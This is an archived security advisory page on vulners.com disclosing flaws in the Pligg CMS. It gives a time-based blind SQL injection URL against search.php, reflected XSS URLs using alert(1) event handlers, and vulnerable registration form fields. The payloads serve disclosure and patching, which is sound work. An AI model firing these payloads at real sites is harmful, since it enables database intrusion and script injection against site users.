Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:25398
HistoryDec 28, 2010 - 12:00 a.m.

Pligg XSS and SQL Injection

2010-12-2800:00:00
vulners.com
921
JSON

Credit: Michael Brooks
Bug Fix in 1.1.2:
http://www.pligg.com/blog/1174/pligg-cms-1-1-2-release/

Special thanks to Eric Heikkinen for patching these quickly.

Blind SQL Injection
http://host/pligg_1.1.2/search.php?adv=1&status=
'and+sleep(9)or+sleep(9)or+1%3D' &search=on&advancesearch= Search
+&sgroup=on&stags=0&slink=on&scategory=on&scomments=0&suser=0

XSS:
http://host/pligg_1.1.2/?xss='onmouseover=alert(1);//
http://host/pligg_1.1.2/?search=" onclick=alert(1) a=

The "onclick" event can be used as reflective xss on /register.php using the following post variables:
reg_username
reg_email
reg_password
reg_password2

JSON